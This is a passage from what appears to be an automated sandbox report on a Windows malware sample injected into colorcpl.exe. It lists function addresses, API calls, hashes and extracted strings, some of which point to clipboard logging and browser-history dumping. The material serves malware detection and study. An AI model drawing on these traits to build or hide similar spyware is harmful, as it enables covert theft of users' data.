                                                                                                                              • Opcode Fuzzy Hash: 74b74212c2fd84d6d734e00da0661cb855aa4f928a97c7596fbdaa82720cb03e
                                                                                                                              • Instruction Fuzzy Hash: AC01D6B2709A217EF71159B96CC4D67624DDF613B9328032AFA31513D0FB74ECA549B0
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 046A8566 Relevance: 6.1, APIs: 4, Instructions: 52libraryCOMMONLIBRARYCODE
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,00000000,00000000,00000000,?,046A850D,00000000,00000000,00000000,00000000,?,046A8839,00000006,FlsSetValue), ref: 046A8598
                                                                                                                              • GetLastError.KERNEL32(?,046A850D,00000000,00000000,00000000,00000000,?,046A8839,00000006,FlsSetValue,046BF160,046BF168,00000000,00000364,?,046A82E7), ref: 046A85A4
                                                                                                                              • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,046A850D,00000000,00000000,00000000,00000000,?,046A8839,00000006,FlsSetValue,046BF160,046BF168,00000000), ref: 046A85B2
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000005.00000002.4443582321.0000000004660000.00000040.00001000.00020000.00000000.sdmp, Offset: 04660000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_5_2_4660000_colorcpl.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: LibraryLoad$ErrorLast
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 3177248105-0
                                                                                                                              • Opcode ID: 01e84f1d79c4df9ae31a9a687d0f4de98cb96f8e69deedafdc7b4ee809c5cd2b
                                                                                                                              • Instruction ID: c66099c5465f95f369d4f578515b462c85c912b428809ce8f5c8478dda5661c4
                                                                                                                              • Opcode Fuzzy Hash: 01e84f1d79c4df9ae31a9a687d0f4de98cb96f8e69deedafdc7b4ee809c5cd2b
                                                                                                                              • Instruction Fuzzy Hash: D8017B72716A229BC761AE399C44A577B98EF117A1B100220FE06D3340FB34FC11CEE0
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 0467C485 Relevance: 6.0, APIs: 4, Instructions: 50fileCOMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              • CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,?,?,?,00000000,0466A843), ref: 0467C49E
                                                                                                                              • GetFileSize.KERNEL32(00000000,00000000), ref: 0467C4B2
                                                                                                                              • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 0467C4D7
                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 0467C4E5
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000005.00000002.4443582321.0000000004660000.00000040.00001000.00020000.00000000.sdmp, Offset: 04660000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_5_2_4660000_colorcpl.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: File$CloseCreateHandleReadSize
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 3919263394-0
                                                                                                                              • Opcode ID: 5e509ba552025429b6ff043a3c40c27577e5d33a575906af3defaa2c22a4c704
                                                                                                                              • Instruction ID: 5e9ede811acacfef424229386365c47e69105c3a7ed9a207e49c7b27a1f2fbe3
                                                                                                                              • Opcode Fuzzy Hash: 5e509ba552025429b6ff043a3c40c27577e5d33a575906af3defaa2c22a4c704
                                                                                                                              • Instruction Fuzzy Hash: F3F096B12413187FF7105E25AC94FBF379CEB877A4F00152DFA02E22C0EA255D099171
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 0467C1DD Relevance: 6.0, APIs: 4, Instructions: 48COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              • OpenProcess.KERNEL32(00001000,00000000,?,00000000,00000000,00000000), ref: 0467C1F5
                                                                                                                              • OpenProcess.KERNEL32(00000400,00000000,?,?,00000000,00000000,00000000), ref: 0467C208
                                                                                                                              • CloseHandle.KERNEL32(00000000,?,00000000,00000000,00000000), ref: 0467C233
                                                                                                                              • CloseHandle.KERNEL32(00000000,?,00000000,00000000,00000000), ref: 0467C23B
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000005.00000002.4443582321.0000000004660000.00000040.00001000.00020000.00000000.sdmp, Offset: 04660000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_5_2_4660000_colorcpl.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: CloseHandleOpenProcess
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 39102293-0
                                                                                                                              • Opcode ID: f7639332f4a5738c516136148658dd0e725095b3fbaf80409dbd4e5fac3710e7
                                                                                                                              • Instruction ID: c9a4887a210b931460bb76c97fc7cd3af752347f18084f00c3bd25755e76ac7b
                                                                                                                              • Opcode Fuzzy Hash: f7639332f4a5738c516136148658dd0e725095b3fbaf80409dbd4e5fac3710e7
                                                                                                                              • Instruction Fuzzy Hash: 2A0149F12403156BD71056D89C49F7BB37CDB44785F000055FB14C2290FF70AD8186B1
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 04699863 Relevance: 6.0, APIs: 4, Instructions: 48COMMONLIBRARYCODE
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              • ___BuildCatchObject.LIBVCRUNTIME ref: 0469987A
                                                                                                                                • Part of subcall function 04699EB2: ___AdjustPointer.LIBCMT ref: 04699EFC
                                                                                                                              • _UnwindNestedFrames.LIBCMT ref: 04699891
                                                                                                                              • ___FrameUnwindToState.LIBVCRUNTIME ref: 046998A3
                                                                                                                              • CallCatchBlock.LIBVCRUNTIME ref: 046998C7
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000005.00000002.4443582321.0000000004660000.00000040.00001000.00020000.00000000.sdmp, Offset: 04660000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_5_2_4660000_colorcpl.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: CatchUnwind$AdjustBlockBuildCallFrameFramesNestedObjectPointerState
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 2633735394-0
                                                                                                                              • Opcode ID: f1135f3da04ba3a0995d0d42191a6de0eafd24a9b56dad318990318c05e81e44
                                                                                                                              • Instruction ID: fb7d8d1c46f8fcda2254f07699f2bfc6afd7e75760fe687e2470a1720e8626ee
                                                                                                                              • Opcode Fuzzy Hash: f1135f3da04ba3a0995d0d42191a6de0eafd24a9b56dad318990318c05e81e44
                                                                                                                              • Instruction Fuzzy Hash: A701C572000109BBDF125F55CD00EAA3BBAEF98754F05451DF95865220E3B6E8A5DBA4
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 0671A56F Relevance: 6.0, APIs: 4, Instructions: 48COMMONLIBRARYCODE
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              • ___BuildCatchObject.LIBVCRUNTIME ref: 0671A586
                                                                                                                                • Part of subcall function 0671ABBE: ___AdjustPointer.LIBCMT ref: 0671AC08
                                                                                                                              • _UnwindNestedFrames.LIBCMT ref: 0671A59D
                                                                                                                              • ___FrameUnwindToState.LIBVCRUNTIME ref: 0671A5AF
                                                                                                                              • CallCatchBlock.LIBVCRUNTIME ref: 0671A5D3
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000005.00000002.4443972597.00000000066E0000.00000040.00000400.00020000.00000000.sdmp, Offset: 066E0000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_5_2_66e0000_colorcpl.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: CatchUnwind$AdjustBlockBuildCallFrameFramesNestedObjectPointerState
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 2633735394-0
                                                                                                                              • Opcode ID: f1135f3da04ba3a0995d0d42191a6de0eafd24a9b56dad318990318c05e81e44
                                                                                                                              • Instruction ID: 7c653d241c324edf868851baab3fed3d93345bc542d4651c23d9c54f25518d72
                                                                                                                              • Opcode Fuzzy Hash: f1135f3da04ba3a0995d0d42191a6de0eafd24a9b56dad318990318c05e81e44
                                                                                                                              • Instruction Fuzzy Hash: BD015E32401208FBCF925F59CC04EEA7BBAFF49710F044116FE586A120D332E5A1DBA0
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 046793E3 Relevance: 6.0, APIs: 4, Instructions: 43COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              • GetSystemMetrics.USER32(0000004C), ref: 046793F0
                                                                                                                              • GetSystemMetrics.USER32(0000004D), ref: 046793F6
                                                                                                                              • GetSystemMetrics.USER32(0000004E), ref: 046793FC
                                                                                                                              • GetSystemMetrics.USER32(0000004F), ref: 04679402
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000005.00000002.4443582321.0000000004660000.00000040.00001000.00020000.00000000.sdmp, Offset: 04660000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_5_2_4660000_colorcpl.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: MetricsSystem
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 4116985748-0
                                                                                                                              • Opcode ID: 249834b7a9558a980b9c7d50752fdebbbe31f8bce367d91971dc2a720068ce26
                                                                                                                              • Instruction ID: 1126e1a61fbf08206b54a68817c4307b8f1f8ad92833c8b62b3690ac4e9bccf0
                                                                                                                              • Opcode Fuzzy Hash: 249834b7a9558a980b9c7d50752fdebbbe31f8bce367d91971dc2a720068ce26
                                                                                                                              • Instruction Fuzzy Hash: ACF0AFF2B403155BF740EE758844A2F6BD5EBC5264F10483EE2088B280FEB4EC098B81
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 04698F31 Relevance: 6.0, APIs: 4, Instructions: 14COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              • ___vcrt_initialize_pure_virtual_call_handler.LIBVCRUNTIME ref: 04698F31
                                                                                                                              • ___vcrt_initialize_winapi_thunks.LIBVCRUNTIME ref: 04698F36
                                                                                                                              • ___vcrt_initialize_locks.LIBVCRUNTIME ref: 04698F3B
                                                                                                                                • Part of subcall function 0469A43A: ___vcrt_InitializeCriticalSectionEx.LIBVCRUNTIME ref: 0469A44B
                                                                                                                              • ___vcrt_uninitialize_locks.LIBVCRUNTIME ref: 04698F50
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000005.00000002.4443582321.0000000004660000.00000040.00001000.00020000.00000000.sdmp, Offset: 04660000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_5_2_4660000_colorcpl.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: CriticalInitializeSection___vcrt____vcrt_initialize_locks___vcrt_initialize_pure_virtual_call_handler___vcrt_initialize_winapi_thunks___vcrt_uninitialize_locks
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 1761009282-0
                                                                                                                              • Opcode ID: 37419d0d218480942dadea5656795116f0d18a982b1fc86bcd770d00ce79fbb1
                                                                                                                              • Instruction ID: a3adca4410c620174a4f545f6a4aeb27cc16087bac2a3df8f61cd2745b29df1a
                                                                                                                              • Opcode Fuzzy Hash: 37419d0d218480942dadea5656795116f0d18a982b1fc86bcd770d00ce79fbb1
                                                                                                                              • Instruction Fuzzy Hash: B4C002140203C1563D507EF022182BD03CE1AA36CCBC064DD889197502BAC63C0A602E
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 06719C3D Relevance: 6.0, APIs: 4, Instructions: 14COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              • ___vcrt_initialize_pure_virtual_call_handler.LIBVCRUNTIME ref: 06719C3D
                                                                                                                              • ___vcrt_initialize_winapi_thunks.LIBVCRUNTIME ref: 06719C42
                                                                                                                              • ___vcrt_initialize_locks.LIBVCRUNTIME ref: 06719C47
                                                                                                                                • Part of subcall function 0671B146: ___vcrt_InitializeCriticalSectionEx.LIBVCRUNTIME ref: 0671B157
                                                                                                                              • ___vcrt_uninitialize_locks.LIBVCRUNTIME ref: 06719C5C
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000005.00000002.4443972597.00000000066E0000.00000040.00000400.00020000.00000000.sdmp, Offset: 066E0000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_5_2_66e0000_colorcpl.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: CriticalInitializeSection___vcrt____vcrt_initialize_locks___vcrt_initialize_pure_virtual_call_handler___vcrt_initialize_winapi_thunks___vcrt_uninitialize_locks
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 1761009282-0
                                                                                                                              • Opcode ID: 37419d0d218480942dadea5656795116f0d18a982b1fc86bcd770d00ce79fbb1
                                                                                                                              • Instruction ID: 376f8a6ac4fe7e44f370d889ece667965b25150275feb34cd11f4921c8f97277
                                                                                                                              • Opcode Fuzzy Hash: 37419d0d218480942dadea5656795116f0d18a982b1fc86bcd770d00ce79fbb1
                                                                                                                              • Instruction Fuzzy Hash: C3C04C14520601A43FD43E7C1BA91FE03951C628C9B8155C78BB41F102DD05510B60B3
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 046A2C5D Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 189COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              • __startOneArgErrorHandling.LIBCMT ref: 046A2CED
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000005.00000002.4443582321.0000000004660000.00000040.00001000.00020000.00000000.sdmp, Offset: 04660000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_5_2_4660000_colorcpl.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: ErrorHandling__start
                                                                                                                              • String ID: pow
                                                                                                                              • API String ID: 3213639722-2276729525
                                                                                                                              • Opcode ID: f9bb6ab39d8151c4494b4365a3d59517d07076bde082e05202da53c5fd092972
                                                                                                                              • Instruction ID: 46fa23450d43c9556c7f01b4983363b1683d70209499f71038b47a5a051673c9
                                                                                                                              • Opcode Fuzzy Hash: f9bb6ab39d8151c4494b4365a3d59517d07076bde082e05202da53c5fd092972
                                                                                                                              • Instruction Fuzzy Hash: 60518E61A45E0286D716BB14C92036A3BA5EF10750F204DDDE087817EAFB35ACF59E87
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 066E9518 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 186COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              • __EH_prolog.LIBCMT ref: 066E951D
                                                                                                                              • __CxxThrowException@8.LIBVCRUNTIME ref: 066E95FE
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000005.00000002.4443972597.00000000066E0000.00000040.00000400.00020000.00000000.sdmp, Offset: 066E0000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_5_2_66e0000_colorcpl.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: Exception@8H_prologThrow
                                                                                                                              • String ID: hdF
                                                                                                                              • API String ID: 3222999186-665520524
                                                                                                                              • Opcode ID: 343675e76b0a0f9536e7689d5bfc322d86527155193a82fc771824cafc66db2c
                                                                                                                              • Instruction ID: 5910e3854272579b8ddb1b069b8a365ee14f0037f9d1ca1a4f9670b17471eeaa
                                                                                                                              • Opcode Fuzzy Hash: 343675e76b0a0f9536e7689d5bfc322d86527155193a82fc771824cafc66db2c
                                                                                                                              • Instruction Fuzzy Hash: 2C517432902108AACFD4FF60DD969ED7B7DAF14340F50025DE826A7190EF349B89CB95
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 0672C0C8 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 152COMMONLIBRARYCODE
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000005.00000002.4443972597.00000000066E0000.00000040.00000400.00020000.00000000.sdmp, Offset: 066E0000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_5_2_66e0000_colorcpl.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: __fassign
                                                                                                                              • String ID: PkGNG
                                                                                                                              • API String ID: 3965848254-263838557
                                                                                                                              • Opcode ID: 0bfd670419a30e70b2122a04c0ff37dc7c92f96e788d8b5757dd12d671b03cbd
                                                                                                                              • Instruction ID: 02886470884d9f318e87f4c5a61e8c8c03e36e822b69b4f57d20c5ce9dfac2d9
                                                                                                                              • Opcode Fuzzy Hash: 0bfd670419a30e70b2122a04c0ff37dc7c92f96e788d8b5757dd12d671b03cbd
                                                                                                                              • Instruction Fuzzy Hash: 7251B1B0D0025AAFDB51CFA8DC45AEEBBF8EF19700F24416EE955E7291D6309940CB64
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 066FCD27 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 139COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000005.00000002.4443972597.00000000066E0000.00000040.00000400.00020000.00000000.sdmp, Offset: 066E0000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_5_2_66e0000_colorcpl.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: _memcmp_wcslen
                                                                                                                              • String ID: ?
                                                                                                                              • API String ID: 1846113162-1684325040
                                                                                                                              • Opcode ID: abe7e308a1a6702f98718e9be80ca678ae2d2d31c1c14d85f2c6eaae61ca29ed
                                                                                                                              • Instruction ID: 0958e652da7918a42f50c3c8a33894c19f4db3fe08cf0fedac78bc2ffbb97701
                                                                                                                              • Opcode Fuzzy Hash: abe7e308a1a6702f98718e9be80ca678ae2d2d31c1c14d85f2c6eaae61ca29ed
                                                                                                                              • Instruction Fuzzy Hash: DE41917191834AAFE760DF64DC4999B77ECAB84751F00092AF685C2161EB74C948C7D2
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 0466404C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 93sleepCOMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 04664066
                                                                                                                                • Part of subcall function 0467B978: GetCurrentProcessId.KERNEL32(00000000,75923530,00000000,?,?,?,?,046C6468,0466D20D,.vbs,?,?,?,?,?,046D52F0), ref: 0467B99F
                                                                                                                                • Part of subcall function 04678568: CloseHandle.KERNEL32(046640F5,?,?,046640F5,046C5E74), ref: 0467857E
                                                                                                                                • Part of subcall function 04678568: CloseHandle.KERNEL32(046C5E74,?,?,046640F5,046C5E74), ref: 04678587
                                                                                                                                • Part of subcall function 0467C485: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,?,?,?,00000000,0466A843), ref: 0467C49E
                                                                                                                              • Sleep.KERNEL32(000000FA,046C5E74), ref: 04664138
                                                                                                                              Strings
                                                                                                                              • /sort "Visit Time" /stext ", xrefs: 046640B2
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000005.00000002.4443582321.0000000004660000.00000040.00001000.00020000.00000000.sdmp, Offset: 04660000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_5_2_4660000_colorcpl.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: CloseFileHandle$CreateCurrentModuleNameProcessSleep
                                                                                                                              • String ID: /sort "Visit Time" /stext "
                                                                                                                              • API String ID: 368326130-1573945896
                                                                                                                              • Opcode ID: e5e26634435c7ad41e665f0c3fa6d2e648bc19bb5fa83a416193c63cb9bcdd39
                                                                                                                              • Instruction ID: ded52e456d05725473134f6f4dec36267a7afefa23b574415dd8cb3dcbb7fbb1
                                                                                                                              • Opcode Fuzzy Hash: e5e26634435c7ad41e665f0c3fa6d2e648bc19bb5fa83a416193c63cb9bcdd39
                                                                                                                              • Instruction Fuzzy Hash: 79313E31A101189BEB18FAB4DCA59FEB7B9AF91309F40006DE507A7194FF307D49CA98
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 0466B748 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 88COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                                • Part of subcall function 04694770: __onexit.LIBCMT ref: 04694776
                                                                                                                              • __Init_thread_footer.LIBCMT ref: 0466B797
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000005.00000002.4443582321.0000000004660000.00000040.00001000.00020000.00000000.sdmp, Offset: 04660000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_5_2_4660000_colorcpl.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: Init_thread_footer__onexit
                                                                                                                              • String ID: [End of clipboard]$[Text copied to clipboard]
                                                                                                                              • API String ID: 1881088180-3686566968
                                                                                                                              • Opcode ID: 7ffed1e4cfa7ce96632433d3d5c31b2eed2e7ee571021fe256d69a94951c0786
                                                                                                                              • Instruction ID: 1c6ed7e39ac66297805736fcf6815d4a3ec60865ba3dcf0e5c9707282dbf670e
                                                                                                                              • Opcode Fuzzy Hash: 7ffed1e4cfa7ce96632433d3d5c31b2eed2e7ee571021fe256d69a94951c0786
                                                                                                                              • Instruction Fuzzy Hash: E2219C31A101198BEB14FBB4E8919EDB7B9AF51619F10012ED50BA7180FF30BD4ACA98
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 046B1B37 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 88COMMONLIBRARYCODE
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              • GetACP.KERNEL32(?,20001004,?,00000002,00000000,00000050,00000050,?,046B1D92,?,00000050,?,?,?,?,?), ref: 046B1C12
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000005.00000002.4443582321.0000000004660000.00000040.00001000.00020000.00000000.sdmp, Offset: 04660000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_5_2_4660000_colorcpl.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID: ACP$OCP
                                                                                                                              • API String ID: 0-711371036
                                                                                                                              • Opcode ID: 3ea030991125bb485be30f42cd9004af38828f6a6b9265e644e43ee1f1f93c9d
                                                                                                                              • Instruction ID: 3c278618c82ec3fe1f9d6e4c183e26dc853ed9db66b79ce8c923c6781b966182
                                                                                                                              • Opcode Fuzzy Hash: 3ea030991125bb485be30f42cd9004af38828f6a6b9265e644e43ee1f1f93c9d
                                                                                                                              • Instruction Fuzzy Hash: F921F762B00101B6E7248E54C960BE7726AEB62BE5F5A4564D98AD7300F732FAC1C3D0
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 066F6FF0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 79COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              • _wcslen.LIBCMT ref: 066F7001
                                                                                                                                • Part of subcall function 066EAAF0: _wcslen.LIBCMT ref: 066EAB09
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000005.00000002.4443972597.00000000066E0000.00000040.00000400.00020000.00000000.sdmp, Offset: 066E0000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_5_2_66e0000_colorcpl.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: _wcslen
                                                                                                                              • String ID: !D@$PG
                                                                                                                              • API String ID: 176396367-1987221222
                                                                                                                              • Opcode ID: 3229767f42b224c22e38ab05f87ced9dbd25ea478007aec8b0515c8cef1bdfe3
                                                                                                                              • Instruction ID: 2cec438619d899aa0984e8b75871c854e79231c51739a73c622aa902ad87a09d
                                                                                                                              • Opcode Fuzzy Hash: 3229767f42b224c22e38ab05f87ced9dbd25ea478007aec8b0515c8cef1bdfe3
                                                                                                                              • Instruction Fuzzy Hash: 7111A231B556001BDBD87B74AC71ABD3A8F9BA0700F44842EAD668F2D0DEA98A84525D
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 066E5313 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 74COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000005.00000002.4443972597.00000000066E0000.00000040.00000400.00020000.00000000.sdmp, Offset: 066E0000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_5_2_66e0000_colorcpl.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: H_prolog
                                                                                                                              • String ID: NG$}E
                                                                                                                              • API String ID: 3519838083-2251168990
                                                                                                                              • Opcode ID: 531294bc55fe6296708d9916624f17236c631622ca51f748c31d8835be279a7a
                                                                                                                              • Instruction ID: d163af0a5b2070597fe7923cb73b45bc9a0a4a0bd73ce4c45788f37ae2a9deb2
                                                                                                                              • Opcode Fuzzy Hash: 531294bc55fe6296708d9916624f17236c631622ca51f748c31d8835be279a7a
                                                                                                                              • Instruction Fuzzy Hash: C1213731E011189BCB98F7A4DD529FEBB7AEF54610F10812EE12563290DF349F4AC758
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 0467B4EF Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 59timeCOMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              • GetLocalTime.KERNEL32(00000000), ref: 0467B509
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000005.00000002.4443582321.0000000004660000.00000040.00001000.00020000.00000000.sdmp, Offset: 04660000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_5_2_4660000_colorcpl.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: LocalTime
                                                                                                                              • String ID: | $%02i:%02i:%02i:%03i
                                                                                                                              • API String ID: 481472006-2430845779
                                                                                                                              • Opcode ID: 3d566d7c4f3385b24c198df13b1cf86b601e1d83ddfd85be2c45a82a98b63450
                                                                                                                              • Instruction ID: b8b9a3c9d0501946a28025597dcdf852fce33c5ed2ce5c8b6da47979b1c2e9d5
                                                                                                                              • Opcode Fuzzy Hash: 3d566d7c4f3385b24c198df13b1cf86b601e1d83ddfd85be2c45a82a98b63450
                                                                                                                              • Instruction Fuzzy Hash: F7116D729182045BE704FB66D8548FFB3E8AB49608F50091EF497921D0FF38FA49D76A
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 066E8209 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 56COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000005.00000002.4443972597.00000000066E0000.00000040.00000400.00020000.00000000.sdmp, Offset: 066E0000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_5_2_66e0000_colorcpl.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: _wcslen
                                                                                                                              • String ID: $$cF
                                                                                                                              • API String ID: 176396367-3386849937
                                                                                                                              • Opcode ID: a3f0521951bb9342bb967e70cc438d07290dcccf7f3efa3b8b817ec6fb2293fa
                                                                                                                              • Instruction ID: 3bbb013077a940df164aaee98bb11a36c434f0957023bd8fd9350d932e61f94f
                                                                                                                              • Opcode Fuzzy Hash: a3f0521951bb9342bb967e70cc438d07290dcccf7f3efa3b8b817ec6fb2293fa
                                                                                                                              • Instruction Fuzzy Hash: EC115672941218BFD790E794DC45FDEBBB89F54710F15009BE914B3340E7789A44C6BA
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 0466B051 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 48COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
